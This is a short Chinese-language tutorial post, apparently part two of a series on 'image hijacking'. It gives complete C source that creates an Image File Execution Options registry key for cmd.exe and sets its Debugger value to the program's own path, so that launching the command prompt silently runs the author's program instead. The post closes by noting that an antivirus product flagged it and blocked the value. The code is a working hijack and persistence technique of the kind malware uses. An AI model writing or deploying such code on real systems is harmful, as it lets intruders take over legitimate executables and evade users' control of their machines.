映像劫持技术（2）：实例

在Image File Execution Options下创建cmd.exe项，将其“重定向”到我们自己编写的程序

#include<stdio.h>
#include<windows.h>

int main()
{
HKEY hKey;
DWORD dwDisposition=REG_CREATED_NEW_KEY;  //新建一个子项
if((::RegCreateKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Cmd.exe",
0,
NULL,
REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS,
NULL,
&hKey,
&dwDisposition))==ERROR_SUCCESS)
{
printf("success to Create the reg key.\n");
char strPath[MAX_PATH];
int size=GetModuleFileName(NULL,strPath,sizeof(strPath));
int ret=RegSetValueEx(hKey,"Debugger",0,REG_SZ,(const unsigned char *)strPath,size);
if(ret==ERROR_SUCCESS)
{
printf("success to set the registry keys.\n");
}
else
{
printf("fail to set the registry keys.\n");
}
RegCloseKey(hKey);
}
else
{
printf("fail to create a reg key.\n");
}
return 0;
}

程序运行的结果只是在创建了cmd.exe项目，在设置该项的值的时候，360安全卫士报毒了，设置不成功